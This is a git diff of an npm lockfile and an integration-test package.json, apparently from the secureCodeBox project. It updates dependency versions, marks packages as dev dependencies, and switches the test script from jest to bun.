"shebang-regex": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "dev": true }, "signal-exit": { "version": "3.0.7", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "dev": true }, "sisteransi": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==" + "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "dev": true }, "slash": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==" + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true + }, + "smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "dev": true + }, + "socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "dev": true, + "requires": { + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" + } + }, + "socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "dev": true, + "requires": { + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" + } }, "source-map": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==" + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "dev": true }, "source-map-support": { "version": "0.5.13", "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", + "dev": true, "requires": { "buffer-from": "^1.0.0", "source-map": "^0.6.0" @@ -6741,29 +7092,14 @@ "sprintf-js": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==" - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dev": true, - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } + "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", + "dev": true }, "stack-utils": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", + "dev": true, "requires": { "escape-string-regexp": "^2.0.0" } @@ -6774,10 +7110,22 @@ "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", "dev": true }, + "streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "dev": true, + "requires": { + "bare-events": "^2.2.0", + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" + } + }, "string-length": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", + "dev": true, "requires": { "char-regex": "^1.0.2", "strip-ansi": "^6.0.0" @@ -6787,6 +7135,7 @@ "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dev": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", @@ -6797,6 +7146,7 @@ "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dev": true, "requires": { "ansi-regex": "^5.0.1" } @@ -6804,22 +7154,26 @@ "strip-bom": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==" + "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", + "dev": true }, "strip-final-newline": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==" + "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", + "dev": true }, "strip-json-comments": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==" + "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", + "dev": true }, "supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, "requires": { "has-flag": "^4.0.0" } @@ -6827,67 +7181,78 @@ "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" + "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "dev": true }, - "tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", + "tar-fs": { + "version": "3.0.10", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.10.tgz", + "integrity": "sha512-C1SwlQGNLe/jPNqapK8epDsXME7CAJR5RL3GcE6KWx1d9OUByzoHVcbu1VPI8tevg9H8Alae0AApHHFGzrD5zA==", "dev": true, "requires": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "dependencies": { - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0", + "pump": "^3.0.0", + "tar-stream": "^3.1.5" + } + }, + "tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "dev": true, + "requires": { + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, "test-exclude": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", + "dev": true, "requires": { "@istanbuljs/schema": "^0.1.2", "glob": "^7.1.4", "minimatch": "^3.0.4" } }, + "text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "dev": true, + "requires": { + "b4a": "^1.6.4" + } + }, "tmpl": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==" + "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", + "dev": true }, "to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, "requires": { "is-number": "^7.0.0" } }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dev": true, - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "dev": true }, "ts-jest": { "version": "29.2.5", "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", + "dev": true, "requires": { "bs-logger": "^0.2.6", "ejs": "^3.1.10", @@ -6903,109 +7268,87 @@ "semver": { "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==" + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true } } }, - "tslib": { - "version": "2.6.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.0.tgz", - "integrity": "sha512-7At1WUettjcSRHXCyYtTselblcHl9PJFFVKiCAy/bY97+BPZXSQ2wbq0P9s8tK2G7dFQfNnlJnPAiArVBVBsfA==", - "dev": true - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dev": true, - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==", - "dev": true - }, "type-detect": { "version": "4.0.8", "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==" + "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", + "dev": true }, "type-fest": { "version": "0.21.3", "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==" + "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "dev": true }, "typescript": { "version": "5.7.2", "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", + "dev": true, "peer": true }, "undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==" + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dev": true }, "update-browserslist-db": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", + "dev": true, "requires": { "escalade": "^3.2.0", "picocolors": "^1.1.0" } }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dev": true, - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "dev": true - }, "v8-to-istanbul": { "version": "9.3.0", "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", + "dev": true, "requires": { "@jridgewell/trace-mapping": "^0.3.12", "@types/istanbul-lib-coverage": "^2.0.1", "convert-source-map": "^2.0.0" } }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "dev": true, - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, "walker": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", + "dev": true, "requires": { "makeerror": "1.0.12" } }, + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "dev": true + }, + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dev": true, + "requires": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, "which": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dev": true, "requires": { "isexe": "^2.0.0" } @@ -7014,6 +7357,7 @@ "version": "7.0.0", "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dev": true, "requires": { "ansi-styles": "^4.0.0", "string-width": "^4.1.0", @@ -7023,38 +7367,43 @@ "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "dev": true }, "write-file-atomic": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", + "dev": true, "requires": { "imurmurhash": "^0.1.4", "signal-exit": "^3.0.7" } }, "ws": { - "version": "8.13.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.13.0.tgz", - "integrity": "sha512-x9vcZYTrFPC7aSIbj7sRCYo7L/Xb8Iy+pW0ng0wt2vCJv7M9HOMy0UoN3rr+IFC7hb7vXoqS+P9ktyLLLhO+LA==", + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.2.tgz", + "integrity": "sha512-DMricUmwGZUVr++AEAe2uiVM7UoO9MAVZMDu05UQOaUII0lp+zOzLLU4Xqh/JvTqklB1T4uELaaPBKyjE1r4fQ==", "dev": true, "requires": {} }, "y18n": { "version": "5.0.8", "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==" + "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "dev": true }, "yallist": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==" + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", + "dev": true }, "yargs": { "version": "17.7.2", "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "dev": true, "requires": { "cliui": "^8.0.1", "escalade": "^3.1.1", @@ -7068,12 +7417,14 @@ "yargs-parser": { "version": "21.1.1", "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==" + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "dev": true }, "yocto-queue": { "version": "0.1.0", "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==" + "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "dev": true } } } diff --git a/tests/integration/package.json b/tests/integration/package.json index 80f4d5186b..db13930f68 100644 --- a/tests/integration/package.json +++ b/tests/integration/package.json @@ -4,23 +4,14 @@ "description": "Integration Tests running on a real k8s cluster", "main": "helpers", "scripts": { - "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests", - "test:helpers": "jest helpers.test.js --verbose --ci --colors --coverage --passWithNoTests" - + "test:helpers": "bun test helpers.test.js" }, "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "devDependencies": { - "jest": "^29.7.0", - "prettier": "^3.4.2", - "@kubernetes/client-node": "^0.19.0", + "@kubernetes/client-node": "^1.3.0", "@securecodebox/parser-sdk-nodejs": "file:../../parser-sdk/nodejs" }, - "dependencies": { - "@kubernetes/client-node": "^0.19.0", - "@types/jest": "^29.5.14", - "ts-jest": "^29.2.5" - } -} + "dependencies": {} +} \ No newline at end of file